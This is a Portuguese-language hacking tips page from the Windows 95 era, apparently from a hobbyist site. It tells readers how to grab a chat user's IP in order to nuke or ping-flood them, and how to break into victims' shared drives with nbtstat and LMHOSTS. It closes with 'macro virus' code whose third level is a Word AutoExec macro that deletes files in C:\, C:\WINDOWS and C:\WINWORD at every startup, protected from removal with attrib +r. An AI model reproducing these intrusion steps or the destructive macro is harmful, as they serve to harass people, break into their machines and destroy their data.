Dicas
Rápidas
Pegando IP em
chat:
-
Feche todos os seus
aplicativos de rede, ICQ, FTP, XITAMI..., que você estiver usando. Feche
todos os navegadores que não sejam da sala aonde o cara se encontra é
lógico! Concentre-se só na sala do chat na qual se encontra o cara que
você quer pegar o ip. Peça as pessoas que estão conversando com você para
pararem de te mandarem mensagens, quando isto acontecer mande algumas
mensagens em seqüência para vitima. Alterne para o seu MS-DOS (ALT +TAB)
, na hora e digite: arp -a Ficando assim: C:\WINDOWS> arp -a Neste
momento serão retomados, vários IP'S, ( 4 à 6 em média). O primeiro é
o IP da sala aonde você se encontra. Entretanto, na "MAIORIA DAS VEZES"
o segundo IP é do gafanhoto que você quer mandar para os sapos ! Se você
não tem certeza e deseja confirmar isto, guarde o IP e compare com as
informações que você tem sobre a vítima (provedora por exemplo). Se você
não sabe nada dela, paciência, pegue todos os IP's e nuke um à um, ou
faça um ping flood que será explicado abaixo, ou repita o procedimento
acima várias vezes e guarde os IP'S que estão repetindo com mais freqüência.
E tome as medidas que desejar.
Invasão por IP
-
Aqui você tem um tutorial de como fazer
uma invasão por IP. Você tem que ter os clientes para a rede microsoft
instalado, seus arquivos e impressora compartilhados. Não sabe como fazer
isso? Olhe os passos abaixo. Vá no painel de controle depois em redes.
Caso seu computador não tenha os clientes instalados nem os arquivos e
impressoras compartilhados, instale e compartilhe. Para instalar clique
em adicionar e escolha cliente para rede microsoft e logo em seguida compartilhe
os arquivos e a impressora. O windows 95 assim como o 98 vem com alguns
programas internos que a grande maioria dos usuários desconhecem, dentre
eles estão netstat, nbtstat, ftp e etc, para podermos descobrir alguns
dados da vítima a ser invadida, nos precisamos do programinha chamado
de nbtstat que vem no windows, ele se encontra geralmente no C:\windows.
A vítima a ser invadida tem que ter os clientes para a rede microsoft
também instalados assim como estarem com os arquivos compartilhados podendo
ser um dos drives ou seu disco rígido... isso não chega a ser um grande
problema, pois é muito fácil de convencer alguém a compartilhar seus discos
rígidos, sem contar os que já compartilharam e nem sabem e os administradores
de rede que deixam seus HDs compartilhados para manutenção. As vezes encontramos
alguns desses administradores que compartilham seus discos rígidos sem
senhas... Se você for programador, você pode fazer um programinha que
altere as configurações do computador da pessoa para que automaticamente
seus Drives ou discos rígidos(HDs) fiquem compartilhados por completo
e sem senha. Pode acontecer que você encontre algum computador com os
drives compartilhados e com senha. Ai você vai ter que se virar e descobrir
a senha ou criar um programa que burle isso...
Você precisa saber:
· Ip da vítima.
· O nome do computador da vítima.
-
Existem várias maneiras de se descobrir
o ip de uma pessoa, para isso entre na seção Brincando com o IP da minha
página, lá estão alguns métodos. O nome do computador da vítima você só
descobre depois que já souber do Ip. É nessa hora que o nbtstat entra
em ação.... Para descobrir o nome do computador da vítima vá em iniciar,
depois executar e digite nbtstar -A (ip da vítima) tomei como exemplo
o ip 200.239.43.68. segue exemplo abaixo: Repare nesse exemplo , ele tem
dois nomes seguidos de <3> isso quer dizer que um daqueles nomes
seguido de <3> é o nome do computador da vítima. Ai você que quer
invadir, vai ter que testar os dois até ver qual funciona!!! Pronto agora
que você já sabe o Ip e o nome do computador da vítima, você tem que coloca-los
no lmhosts e salvar esse arquivo dentro da pasta do windows, mas presta
atenção, esse arquivo lmhosts não deve ter nenhuma extensão, é só lmhosts
mesmo. Ele não existe na instalação do windows, ou seja você tem que criar
um arquivo chamado lmhosts. Seguem os exemplos abaixo: Obs: o lmhosts
não se chama lmhosts.sam, apenas lmhosts, ele não tem nenhuma extensão.
Você cria o lmhosts da seguinte forma, coloque o IP 127.0.0.1 (sempre
coloque esse ip 127.0.0.1)e o nome do seu computador em primeiro lugar,
e em seguida os IPs das vítimas e seus respectivos nomes. No exemplo acima
eu coloquei a vítima um computador chamado pr digy, repare como o nome
vem seguido logo depois do IP. Agora que você já criou o arquivo lmhosts
você já pode localizar o computador da vítima na rede, é como se você
estivesse em uma intranet e aquele computador "vítima" também estivesse
nessa mesma internet. Vá em iniciar, localizar , computador. Lá você pode
colocar o Ip da vítima, ou colocar o nome do computador da vítima, tente
os dois, o que funcionar você utiliza. segue o exemplo do IP abaixo.
2ª PARTE:
-
Alegria
de uns, tristeza de outros, na verdade, aqueles que utilizam a rede Dial-Up
do Win95 para sua conecção com a internet podem estar correndo sérios
riscos a não ser, é claro, que assim conectam-se propositalmente, com
intenções "diversas". Utilizar-se de uma conecção PPP do Win95 num provedor
de acesso, significa estar disponibilizando seu computador a todos os
usuário da net. Mesmo sem o compartilhamento de arquivos, existem diversas
ferramentas que permitem a outra pessoa conectar-se ao seu computador
caso você esteja utilizando esse tipo de conecção. conecte-se à Internet
utilizando a rede Dial-Up do Win95. Se o seu provedor não disponibilizar
uma conecção do tipo PPP, estas dicas não funcionarão. Verifique antes,
se você possui os drivers clientes para redes Microsoft. Caso não estejam
instalados, instale-os através do Painel de Controle, no ícone Redes.
Verifique também se o compartilhamento de Arquivos e Impressoras está
instalado. Se estiver, você estará sujeito à que outra pessoa conecte-se
ao seu computador simplesmente sabendo seu IP. Se bem que, para aqueles
que já sabem, existem mil maneiras diferentes de se "burlar" a fraquinha
segurança do Win95. Para você poder encontrar outros computadores compartilhados,
você deve configurar WINS e LMHOSTS. O WINS é utilizado para localizar
os computadores com IP fixo. O LMHOSTS, é acionado automaticamente na
procura de computadores que possuem IP dinâmicos. Configurar essas opções
é simples. Vá ao Painel de Controle e abra Rede. Verifique as propriedades
do protocolo TCP/IP. Alí você encontrará a opção para ativar a resolução
WINS. No caso de você não conhecer nenhum servidor WINS, utilize 204.118.34.6
como primário e 204.118.34.11 como secundário. Esses servidores são dos
USA, e gratuítos. Caso queira outros endereços, utilize um dos mecanismos
de busca na Internet. Para configurar o LMHOSTS, você precisa criar um
arquivo texto simples, utilizando-se até mesmo o Bloco de Notas do Windows.
O arquivo criado deve chamar-se LMHOSTS. É nesse arquivo que ficarão os
endereços de IP e os nomes dos computadores que você terá acesso. Para
localizar um determinado computador, você digita o seu número de IP e
a seguir seu NetBios, na mesma linha, separados por um espaço. Se você
executar o programa NBSTSTAT, seguido da opção -N, você obterá essa lista,
com o nome e o IP de seu computador sempre sendo o primeiro da lista,
seguido das outras máquinas disponíveis, tudo numa janela DOS. Através
do Explorer você poderá ver os computadores disponíveis na rede, dos quais
você ainda poderá utilizar.
Trojans
-
Você
conhece aquela história sobre o presente de grego (literalmente), um belo
cavalo de madeira, que escondia centenas de soldados prontos para acabar
com a paz dos troianos, certo?
Na era da informática não mudou muito, a não ser pelo fato de que os cavalos
de madeira são feitos agora de bytes. Os chamados "programas Cavalo-de-Tróia"
são, aparentemente, programas comuns, muitas vezes conhecidos, algumas
vezes novos, mas que sempre fazem algo mais do que anunciam.
Seja capturar senhas, causar estragos ou tirar proveito do usuário de
alguma forma não documentada. Ta complicado? Imagina o seguinte: toda
vez que você se conecta ao seu provedor, ele executa um programa chamado
"login", que lhe pergunta seu nome e sua senha. Imagina se alguém faz
um programa muito parecido com o "login" mas que, ao invés de lhe conectar
no provedor, ele faz uma cópia da sua senha em um arquivo escondido, onde
apenas o autor do programa alterado sabe o local. Em alguns dias ele resgata
este arquivo e terá nas mãos a senha de quase todos os usuários do seu
provedor.
Algumas pessoas têm confundido Cavalos de Tróia com Backdoors. Os conceitos
são parecidos, mas existem diferenças fundamentais. Por exemplo: o Back
Orifice e o NetBus são Cavalos de Tróia, pois não possuem nenhuma finalidade
prática para a vítima. Já o ICKiller, que derruba usuários do ICQ possui
uma backdoor, pois há uma porta dos
fundos que permite certas invasões.
Vírus
de Macro
- Word
possui um arquivo chamado "normal.dot" onde estão todas as configuracões
padrão do word. Se por algum motivo este arquivo for deletado o Word cria
automaticamente quando for inicializado.
Niveis
de sacanagem
Nivel 1..... Apenas uma brincadeira
Nivel 2..... Apenas uma brincadeira de mau gosto
Nivel 3..... não é mais brincadeira.
- Primeiro
você precisa criar uma macro... siga os passos:
Entre no Word, feche a janela de documento, não deixe nenhum documento
aberto(ativo), clique em Arquivo(File) depois Macro, coloque no nome da
macro "AutoExec"(obrigatorio) esta macro é inicializada toda vez que o
Word for iniciado, depois clique em 'Criar', delete as duas linhas que
tiver la (Sub MAIN e End Sub) e cole a rotina que tem logo mais abaixo.
ps:
existe outras formas/meios d criar uma macro,mas esta é mais simples.
Nivel
1
- O
nivel 1 serve para voce se mostrar, falando que entende do Word melhor
do que ninguem.
Cada vez que o usuario inicia o Word receberá uma mensagem... de alerta
ou qualquer outro coisa que sair da sua mente. veja abaixo.
Sub
MAIN
MsgBox "Voce ‚ um pentelho! Eu nÆo irei prosseguir com o sistema", "Microsoft
Word", 5
MsgBox "Usuário «Fïgµ®ä» Detectado", "FATAL ERROR", 16
MsgBox "Figuras ", "Os melhores", 64
End Sub
Nivel
2
- É
para deixar o usuario irritadíssimo.
no corpo da macro cole este texto abaixo:
Sub
MAIN
ArquivoNovoPadrão
Inserir "Figuras"
ArquivoNovoPadrão
Inserir "Net"
ArquivoNovoPadrão
Inserir "Killer"
ArquivoNovoPadrão
Inserir "Figuras Net Killer "
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "Figuras Net Killer "
End Sub
Nivel
3
- Bom
este nivel é pura sacanagem,com ele um simples clicar* do mouse, e tudo
desaparece! isto mesmo "del *.*" ou apenas os documentos, voce é quem
sabe.
Sub
MAIN
Kill "C:\*.*"
Kill "C:\WINDOWS\*.*"
Kill "C:\WINWORD\*.*"
End Sub
Lembre-se
de que estes macros, sao gravado no arquivo default do word, ou seja no
'normal.dot' se este arquivo for deletado, o Word cria automaticamente
na inicializacao,entao se voce for fazer estas sacanagens ai acima, proteja
este arquivo, com o comando 'attrib +r'.
OBS:
Espero que essas dicas lhe sejam úteis, só lembrando não somos responsabilizados
por conhecimentos adquiridos aqui. Todos seus atos serão cobrados de você.
.::Angels Life Br Corporation::.
|